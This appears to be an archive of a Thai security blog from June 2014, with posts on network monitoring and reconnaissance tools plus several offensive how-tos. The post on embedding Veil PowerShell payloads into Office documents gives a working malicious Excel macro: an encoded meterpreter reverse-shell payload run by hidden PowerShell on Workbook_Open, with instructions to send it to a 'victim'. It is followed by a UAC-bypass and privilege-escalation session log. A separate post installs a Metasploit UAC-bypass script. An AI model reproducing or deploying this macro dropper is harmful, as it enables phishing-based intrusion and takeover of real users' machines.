Jun 7, 2014

CheatSheet: IPv6

Source: http://www.sans.org/security-resources/ipv6_tcpip_pocketguide.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 6, 2014

Howto: Scan target for checking CVE, OSVDB database with NMAP

1. Download vulscan from http://www.computec.ch/projekte/vulscan/?s=download

2. Extract it to /usr/share/nmap/script/

3. Scan target with script
nmap -sS -sV --script=vulscan/vulscan.nse
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Using nmap to scan for DDOS reflectors

nmap -sU -A -PN -n -pU:19,53,123,161 -script=ntp-monlist,dns-recursion,snmp-sysdescr <target>

- ntp-monlist -> while any open NTP service can be used in a reflective DDOS attack the maximum amplification is achieved with NTP services that permit the monlist command to be executed. This script will do a check to see if monlist can be executed against an open NTP port.  

- dns-recursion -> Normally public DNS servers will only answer DNS queries for which they are authoritative.  A DNS server that permits and processes queries for names it is not authoritative are called recursive DNS servers and recursive DNS servers in most cases are misconfigured. 

- nmp-sysdescr -> attempts to extract more information from the SNMP service.  

- With the snmp-sysdescr script it will usually display more information which may tell you more about the device you are scanning

Source: https://isc.sans.edu/forums/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: ngxtop - real-time metrics for nginx server (and others)

ngxtop parses your nginx access log and outputs useful, top-like, metrics of your nginx server. So you can tell what is happening with your server in real-time.
ngxtop tries to determine the correct location and format of nginx access log file by default, so you can just run ngxtop and having a close look at all requests coming to your nginx server. But it does not limit you to nginx and the default top view. ngxtop is flexible enough for you to configure and change most of its behaviours. You can query for different things, specify your log and format, even parse remote Apache common access log with ease. See sample usages below for some ideas about what you can do with it.


pip install ngxtop
Note: ngxtop is primarily developed and tested with python2 but also supports python3.


    ngxtop [options]
    ngxtop [options] (print|top|avg|sum) <var>
    ngxtop info

    -l <file>, --access-log <file>  access log file to parse.
    -f <format>, --log-format <format>  log format as specify in log_format directive.
    --no-follow  ngxtop default behavior is to ignore current lines in log
                     and only watch for new lines as they are written to the access log.
                     Use this flag to tell ngxtop to process the current content of the access log instead.
    -t <seconds>, --interval <seconds>  report interval when running in follow mode [default: 2.0]

    -g <var>, --group-by <var>  group by variable [default: request_path]
    -w <var>, --having <expr>  having clause [default: 1]
    -o <var>, --order-by <var>  order of output for default query [default: count]
    -n <number>, --limit <number>  limit the number of records included in report for top command [default: 10]
    -a <exp> ..., --a <exp> ...  add exp (must be aggregation exp: sum, avg, min, max, etc.) into output

    -v, --verbose  more verbose output
    -d, --debug  print every line and parsed record
    -h, --help  print this help message.
    --version  print version information.

    Advanced / experimental options:
    -c <file>, --config <file>  allow ngxtop to parse nginx config file for log format and location.
    -i <filter-expression>, --filter <filter-expression>  filter in, records satisfied given expression are processed.
    -p <filter-expression>, --pre-filter <filter-expression> in-filter expression to check in pre-parsing phase.


Default output

$ ngxtop
running for 411 seconds, 64332 records processed: 156.60 req/sec

|   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
|   64332 |         2775.251 | 61262 |  2994 |    71 |     5 |

| request_path                             |   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
| /abc/xyz/xxxx                            |   20946 |          434.693 | 20935 |     0 |    11 |     0 |
| /xxxxx.json                              |    5633 |         1483.723 |  5633 |     0 |     0 |     0 |
| /xxxxx/xxx/xxxxxxxxxxxxx                 |    3629 |         6835.499 |  3626 |     0 |     3 |     0 |
| /xxxxx/xxx/xxxxxxxx                      |    3627 |        15971.885 |  3623 |     0 |     4 |     0 |
| /xxxxx/xxx/xxxxxxx                       |    3624 |         7830.236 |  3621 |     0 |     3 |     0 |
| /static/js/minified/utils.min.js         |    3031 |         1781.155 |  2104 |   927 |     0 |     0 |
| /static/js/minified/xxxxxxx.min.v1.js    |    2889 |         2210.235 |  2068 |   821 |     0 |     0 |
| /static/tracking/js/xxxxxxxx.js          |    2594 |         1325.681 |  1927 |   667 |     0 |     0 |
| /xxxxx/xxx.html                          |    2521 |          573.597 |  2520 |     0 |     1 |     0 |
| /xxxxx/xxxx.json                         |    1840 |          800.542 |  1839 |     0 |     1 |     0 |

View top source IPs of clients

$ ngxtop top remote_addr
running for 20 seconds, 3215 records processed: 159.62 req/sec

top remote_addr
| remote_addr     |   count |
| |      20 |
|    |      16 |
|     |      16 |
|  |      16 |
|     |      16 |
|    |      16 |
|     |      15 |
|    |      15 |
|  |      15 |
|  |      15 |

List 4xx or 5xx responses together with HTTP referer

$ ngxtop -i 'status >= 400' print request status http_referer
running for 2 seconds, 28 records processed: 13.95 req/sec

request, status, http_referer:
| request   |   status | http_referer   |
| -         |      400 | -              |

Parse apache log from remote server with common format

$ ssh user@remote_server tail -f /var/log/apache2/access.log | ngxtop -f common
running for 20 seconds, 1068 records processed: 53.01 req/sec

|   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
|    1068 |        28026.763 |  1029 |    20 |    19 |     0 |

| request_path                             |   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
| /xxxxxxxxxx                              |     199 |        55150.402 |   199 |     0 |     0 |     0 |
| /xxxxxxxx/xxxxx                          |     167 |        47591.826 |   167 |     0 |     0 |     0 |
| /xxxxxxxxxxxxx/xxxxxx                    |      25 |         7432.200 |    25 |     0 |     0 |     0 |
| /xxxx/xxxxx/x/xxxxxxxxxxxxx/xxxxxxx      |      22 |          698.727 |    22 |     0 |     0 |     0 |
| /xxxx/xxxxx/x/xxxxxxxxxxxxx/xxxxxx       |      19 |         7431.632 |    19 |     0 |     0 |     0 |
| /xxxxx/xxxxx/                            |      18 |         7840.889 |    18 |     0 |     0 |     0 |
| /xxxxxxxx/xxxxxxxxxxxxxxxxx              |      15 |         7356.000 |    15 |     0 |     0 |     0 |
| /xxxxxxxxxxx/xxxxxxxx                    |      15 |         9978.800 |    15 |     0 |     0 |     0 |
| /xxxxx/                                  |      14 |            0.000 |     0 |    14 |     0 |     0 |
| /xxxxxxxxxx/xxxxxxxx/xxxxx               |      13 |        20530.154 |    13 |     0 |     0 |     0 |

Source: https://github.com/lebinh/ngxtop

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Article: อธิบายช่องโหว่ร้ายแรง CCS(ChangeCipherSpec) และอื่นๆใน OpenSSL

บทความใหม่เกี่ยวกับช่องโหว่ร้ายแรง CCS Injection และ DTLS DoS และอืนๆของ OpenSSL ในวันที่ 6/6/2014 ครับ

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: WebCookiesSniffer - Capture Web site cookies

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Source: http://www.nirsoft.net/utils/web_cookies_sniffer.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 5, 2014

Howto: Fix Problem about X session Ubuntu 14.04 with Parallel Tool

1. Start up your wonky Ubuntu 14.04 Desktop VM.
2. Log in, and after everything settles down, make sure the Parallels Desktop Status Bar for the VM is showing; you can toggle it using the View menu on the Parallels Desktop system menu.
3. Click to keyboard icon on the VM's Status Bar (It's the left-most icon in the group of icons to the right.), and select 'Ctrl-Alt-F1' to get the Ubuntu console.
4. Log in with an administrator account, such as the one you used to initially install the wonky Parallels Tools.
5. Do the following: cd /etc/X11
6. Do the following: ls -al
7. Look for the the following file left in limbo by Parallels Tools: xorg.conf.[datestring], where [datestring] reflects the date and time you installed the wonky Parallels Tools (e.g., xorg.conf.20140525)
8. Do the following to rename the xorg.conf.[datestring] file to just xorg.conf, using your admin password: sudo mv xorg.conf.[datestring] xorg.conf
9. Do the following to force X11 to reconfig:
a. Change to you home directory: cd ~
b. Look for a directory named '.config'. (Note the leading '.' on the filename - it's a hidden file.) If it is there, do the following to remove it: rm -rf .config
c. Look for a directory named '.compiz'. (Again, note the leading '.' on the filename.) If it is there, which this one may not be, do the following to remove it: rm -rf .compiz
10. Reboot, using your admin password, by doing the following: sudo reboot

Source: http://forum.parallels.com/showthread.php?302652-Beware-of-Ubuntu-14-04 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Vim text editor visual cheat sheet From Linux FAQ

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Webfwlog - Flexible web-based firewall log analyzer and reporting tool

Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP®. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP®. Webfwlog also supports logs saved in a database using the ULOG or NFLOG targets of the linux netfilter project, or any other database logs mapped with a view to the ulogd schema. Versions 1 and 2 of ulogd database schemas are supported. Webfwlog is licensed under the GNU GPL.
Webfwlog fully supports IPv6 for database logs, and netfilter and ipfilter system logs.
With Webfwlog you can design reports to use on your logged data in whatever configuration you desire. Included are example reports as a starting point. You can sort a report with a single click, “drill-down” on the reports all the way to the packet level, and save your reports for later use.

  • A web server with PHP >= 4.1
  • Log files in standard netfilter, ipfilter, ipfw, ipchains or Windows XP® format or database logs populated with the ULOG or NFLOG target of netfilter, or other database logs mapped with a view to ulogd version 1 or 2 schemas
  • A MySQL or PostgreSQL database server:
  • MySQL >= 3.23.52 or any production release of 4.x or 5.x
  • MySQL >= 5 required for IPv6
  • PostgreSQL >= 7.1
  • PostgreSQL >= 7.4 required for IPv6
  • Your favorite web browser.
Source: hack-tools.blackploit.com/2014/06/webfwlog-firewall-log-analyzer.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hooker: Automated Dynamic Analysis of Android Applications

Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
  2. hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
  5. tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be use to prepare an emulator.
Source: https://github.com/AndroidHooker/hooker

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.


Use it, modify it and distribute it without warranty or implied warranty.


git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.


--domain   || -d    The domain you would like to use as a target.
--pages    || -p    The number of pages you would like to hit from the search engine. Default: 10
--all      || -a    Do all of the spidering checks. This is the default check.
--allpages          Find all pages related to the domain, limited by the --pages option.
--allfiles          Find all file types related to the domain, limited to the ones configured.
--neighbours        Find other domains that are on the same IP address.
--urlkeywords       Find page URLs that have 'interesting' keywords in them.
--keywords          Find page content that have 'interesting' keywords in them.
--export   || -e    Request URLs through proxy.
                    Specify a proxy (type://ip:port) or use defaults. Default:
--help     || -h    This output.


- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours 
Source: https://github.com/RandomStorm/passive-spider 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: NINJA-Ping U - high performance network scanner tool

NINJA-PingU Is Not Just a Ping Utility is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin creation.
NINJA PingU comes out of the box with a set of plugins for services analysis and embedded devices identification. More information about those can be found in its home page at http://owasp.github.io/NINJA-PingU

Source: https://github.com/OWASP/NINJA-PingU

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 4, 2014

Howto: Install "Bypassuac" script for Metasploit Post Exploitation in Kali

Bypassuac was used to fix error "
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

After I goolging, I found very interesting message
The getsystem command supports three different methods for elevating your current privileges to SYSTEM, as you can see from this section of source code. When you run getsystem without any parameters, you're actually saying to Meterpreter "please try to get SYSTEM privs using all of the available methods". Meterpreter will try each of those in turn, as soon as one of them succeeds it will stop trying. If it runs out of methods, it will return the error message associated with the latest attempt.

If you want to have Meterpreter use a particular method only, you can force it to do so with the -t option, such as getsystem -t 2 which says "only use the second method".

You'll notice that, in your case, getsystem will result in the same error as getsystem -t 3 which is a side-effect of how getsystem works (ie. the third method is the last one to be tried.

Each method of elevation in getsystem relies on the process having certain properties or permissions. On Windows 7/8/8.1, getsystem will not work with any of these methods because the operating system has been patched to avoid these flaws. To gain SYSTEM privileges on this target you will have to use another method.

So I got bypassuac script
"BypassUAC – Attack that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems."

Now I found that if I bypass UAC first, I  can use getsystem module.

1. Download script from "http://www.secmaniac.com/files/bypassuac.zip"

2. Extract it.

3. Copy bypassuac.rb to /usr/share/metasploit-framework/scripts/meterpreter/
(If you install by yourself, copy to  /opt/metasploit/apps/pro/scripts/meterpreter/)

4. Copy uac folder to "/usr/share/metasploit-framework/data/exploits/"
(If you install by yourself, copy to /opt/metasploit/apps/pro/msf3/data/exploits/)

5. Now you are ready for post exploit.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Embedding Veil Powershell payloads into Office Documents

The original of this howto (The origin use Veil 2.0 but I used Veil 2.8.0 and I add some detail for beginner)

1.Go to Veil-Evasion

2. List payload with list command
> list

3.  Create powershell payload
> 19 (powershell/shellcode_inject/virtual)
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 Payload: powershell/shellcode_inject/virtual loaded

 Available commands:

    set             set a specific option value
    info            show information about the payload
    generate        generate payload
    back            go to the main menu
    exit            exit Veil

 [>] Please enter a command: generate

4. Specific LHOST, LPORT
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 [?] Use msfvenom or supply custom shellcode?

     1 - msfvenom (default)
     2 - Custom

 [>] Please enter the number of your choice: 1

 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload:
 [>] Enter value for 'LHOST', [tab] for local IP:
 [>] Enter value for 'LPORT': 443
 [>] Enter extra msfvenom options in OPTION=value syntax:

 [*] Generating shellcode...

5. Now you got your powershell file
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files:

 Language:        powershell
 Payload:        powershell/shellcode_inject/virtual
 Shellcode:        windows/meterpreter/reverse_tcp
 Options:        LHOST=  LPORT=443
 Payload File:        /root/veil-output/source/payload.bat
 Handler File:        /root/veil-output/handlers/payload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] press any key to return to the main menu:

6. Exit from Veil-Evasion
> exit

7. Got your powershell payload from payload.bat, default path is /root/veil-output/source/. Copy string from 'powershell.exe' to 'ReadToEnd();' to file.

8. Open to Office (Excel)

9. Go to Developer Tab(If it doesn't exists, Go to File -> Excel Options -> Click the Popular button at the left -> Under Top Option for Working with Excel, check the Show Developer tab in the Ribbon option. -> Click Ok button to finish editing.)

10. After got Developer Tab, Click at Visual Basic

11. Create Subfunction “Workbook_Open()”, create two new String objects, “exec” and “str”, and paste this as the string value for “exec” in the VBA pane.

12. Copy string after "FromBase64String" and cut the entire section in between quatation marks and insert it into "str" variable.

Sub Workbook_open()
Dim exec As String
Dim str As String

str = "nVVLj9s2EL77VxCGDjbWWuhlPWIskDRBgABBUWAX7cHwgSKprlBZMiQ68Sbpf6++kYeqN5eiFz6G8/jmmyHpKfEg3i4X+w9N8+l46nq7Wv5l+tY0cXSvm2a5"
str = str + "PojTuWxqJQYr7TiZix3PxafW/mZ78Xvd27Ns3jVNp1ZX2deNONetFZfr/HKdv613/zvO+95Ia56ex0lznPPV75eNmCNfV/+KfZW8jn4cvqje/pfYR3McjF397NlltXy78LqRyHda+08vJyP80aY0/QdT1W1t664VnhL+r/JoxPKPuo2jpfDbcTecpDKCJB"
str = str + "/PrYLmIPyTHAb73J8X3uXB6968uSE52ASXMAgwxdOUBOud2P/yYs3+cPAGVDS4ROV4oopxyONxMFiVOVYYqurnQcHX1sAiHIcsHYcA2wRbmeAAKiZzTnFaKawirKBSalhAFqSsPDswcJAa3hZbhIzYn5LwArOS9OAlxIEE5gAZlWSBISLgsFVYJYaVyYuiF"
str = str + "CgjMsM2AhYDfAURAVmB0wRmOWQSFhEQ5ASyYDYiHEjobQFcRwxyxlw4zEHMMQizxLCFF43TlDIimmCRIRkdunxhliccN044xgw8gCzTLKMY2mUuiSEA0sSkYZ4pWlJyGVNakRfKl1IgfDgtIiZbgrUKeiF4zhBDF66CEfNCfTDVCHrp1mGJOZkJH1JQpcvXN"
str = str + "earfKkU5I/wFVQFwFCkEnMM6l1dcgrEX2WYU9rKkPFpKFOLUowyZSKoJ0OoKAwl3Gtibe7dnIscI+kidf6gHBWsUmXcf0nK/Ucdu60YFfEyX6Y0Z9o1XaGM/VF56I7nirHM/kgvpNyoJwOuFsmMk+WIK+dOxDbIuDcyoinjaEnCHEz9QjWPWUYJmpkXrGLHH"
str = str + "wVXhmmiSxembEuVTkBdDDOFIauYTqpqmnAypmR8BoWiyzn1mmZ/0+2GzFD/RTf+6P2b6iZZhbKs4ps86EalrjeoXwqY0ftCDTJVIeS4VLfq9l3TTi9xehqu6GkJIz6Y8dELQl4mfJnDh0FnXDdyQJc9gT+6KXPdprcpcT0Ep8GWW4AuU+JgmGy3qLperLz6Idh5tfAbM24Gdf/ZtH/aZz9cj9K7u7X4jl/n+u3tp3/vsPIu90/duImj1frOq9cbMZruvfqwEeFa/BDd2frtuWl2fy+8b/Rv3XzaI2sb77LBhP/q0cre+o+NMSfhPxrVtVrgWwuCfwA="

13. Next, we need to properly escape all the quotations on the line by changing \” to \””. There are occurrences before “Invoke-Express”, and before and after the variable “str”.  Finally, we place the entire thing into a Shell().

Sub Workbook_open()
Dim exec As String
Dim str As String

str = "nVVLj9s2EL77VxCGDjbWWuhlPWIskDRBgABBUWAX7cHwgSKprlBZMiQ68Sbpf6++kYeqN5eiFz6G8/jmmyHpKfEg3i4X+w9N8+l46nq7Wv5l+tY0cXSvm2a5"
str = str + "PojTuWxqJQYr7TiZix3PxafW/mZ78Xvd27Ns3jVNp1ZX2deNONetFZfr/HKdv613/zvO+95Ia56ex0lznPPV75eNmCNfV/+KfZW8jn4cvqje/pfYR3McjF397NlltXy78LqRyHda+08vJyP80aY0/QdT1W1t664VnhL+r/JoxPKPuo2jpfDbcTecpDKCJB"
str = str + "/PrYLmIPyTHAb73J8X3uXB6968uSE52ASXMAgwxdOUBOud2P/yYs3+cPAGVDS4ROV4oopxyONxMFiVOVYYqurnQcHX1sAiHIcsHYcA2wRbmeAAKiZzTnFaKawirKBSalhAFqSsPDswcJAa3hZbhIzYn5LwArOS9OAlxIEE5gAZlWSBISLgsFVYJYaVyYuiF"
str = str + "CgjMsM2AhYDfAURAVmB0wRmOWQSFhEQ5ASyYDYiHEjobQFcRwxyxlw4zEHMMQizxLCFF43TlDIimmCRIRkdunxhliccN044xgw8gCzTLKMY2mUuiSEA0sSkYZ4pWlJyGVNakRfKl1IgfDgtIiZbgrUKeiF4zhBDF66CEfNCfTDVCHrp1mGJOZkJH1JQpcvXN"
str = str + "earfKkU5I/wFVQFwFCkEnMM6l1dcgrEX2WYU9rKkPFpKFOLUowyZSKoJ0OoKAwl3Gtibe7dnIscI+kidf6gHBWsUmXcf0nK/Ucdu60YFfEyX6Y0Z9o1XaGM/VF56I7nirHM/kgvpNyoJwOuFsmMk+WIK+dOxDbIuDcyoinjaEnCHEz9QjWPWUYJmpkXrGLHH"
str = str + "wVXhmmiSxembEuVTkBdDDOFIauYTqpqmnAypmR8BoWiyzn1mmZ/0+2GzFD/RTf+6P2b6iZZhbKs4ps86EalrjeoXwqY0ftCDTJVIeS4VLfq9l3TTi9xehqu6GkJIz6Y8dELQl4mfJnDh0FnXDdyQJc9gT+6KXPdprcpcT0Ep8GWW4AuU+JgmGy3qLperLz6Idh5tfAbM24Gdf/ZtH/aZz9cj9K7u7X4jl/n+u3tp3/vsPIu90/duImj1frOq9cbMZruvfqwEeFa/BDd2frtuWl2fy+8b/Rv3XzaI2sb77LBhP/q0cre+o+NMSfhPxrVtVrgWwuCfwA="

exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec = exec + "ader ($(New-Object IO.Compression.DeflateStream "
exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec = exec + "ression.CompressionMode]::Decompress)), [Text.En"
exec = exec + "coding]::ASCII)).ReadToEnd();"""

14. Save it as Excel Macro-Enabled Workbook. and send to your victim machine.

15. Go to Metasploit and create the binding server(payload is windows/meterpreter/reverse_tcp)
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...

16. Waiting for shell. If Excel in victim machine is macro-enable or he is generation Y(Say "yes" all the time).

17. Now you got your shell, try post exploitation.

meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST= LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint with UACBypass in effect...
[*] C:\Users\Sumedt\AppData\Local\Temp\kRNpsDrtub.exe /c %TEMP%\KzhrQvyMZeqDA.exe
meterpreter > [*] Meterpreter session 2 opened ( -> at 2014-06-04 08:57:49 +0700

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf post(getsystem) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter >

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Installing Veil Framework on Kali

Veil framework is a red team toolkit focused on evading detection. It currently contains Veil-Evasion for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and Veil-PowerView for gaining situational awareness on Windows domains.

This post for install Veil to Kali

1. Clone the Veil-Framework from github
# git clone https://github.com/Veil-Framework/Veil

2.  Go to Veil folder
# cd Veil

3. Download(Update) Veil-Catapult, Veil-Evasion, Veil-PowerView with update.sh script

It will take long time. Grab some drink or beer because the script will download many required application, after that you will got the install result screen.

4. After completely install, try to test 1 of 3 modules(Veil-PowerView, Veil-Evasion, Veil-Catapult)

Source: https://github.com/Veil-Framework/Veil

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 2, 2014

Article: เมื่อ Antivirus พ่ายแพ้ให้กับ Malware

 Link: https://dl.dropboxusercontent.com/u/2330423/%E0%B9%80%E0%B8%A1%E0%B8%B7%E0%B9%88%E0%B8%AD%20Antivirus%20%E0%B8%9E%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B9%89%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%81%E0%B8%B1%E0%B8%9A%20Malware.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Argus - Real Time Auditing Network Activity

Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.

Source: hack-tools.blackploit.com/2014/06/argus-v306-real-time-auditing-network.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 1, 2014

Tools: Subgraph OS - OS for secure, free, open-source, and verifiably trustworthy.

The Internet is a hostile environment, and recent revelations have made it more apparent than ever before that risk to every day users extends beyond the need to secure the network transport - the endpoint is also at risk.
Subgraph OS was designed from the ground-up to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network borne attacks.
Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and a proactive, ongoing focus on security and attack resistance. Subgraph OS also places emphasis on the integrity of installable software packages. 

Source: https://subgraph.com/sgos/index.en.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Bro - open-source network traffic analyzer.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expression arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.
Source: https://www.bro.org/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Parsero - Attacking Robots.txt Files

Parsero is a free script written in Python which reads the Robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines what directories or files hosted on a web server mustn't be indexed. For example, "Disallow: /portal/login" means that the content on www.example.com/portal/login it's not allowed to be indexed by crawlers like Google, Bing, Yahoo... This is the way the administrator have to not share sensitive or private information with the search engines.
But sometimes these paths typed in the Disallows entries are directly accessible by the users without using a search engine, just visiting the URL and the Path, and sometimes they are not available to be visited by anybody... Because it is really common that the administrators write a lot of Disallows and some of them are available and some of them are not, you can use Parsero in order to check the HTTP status code of each Disallow entry in order to check automatically if these directories are available or not.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.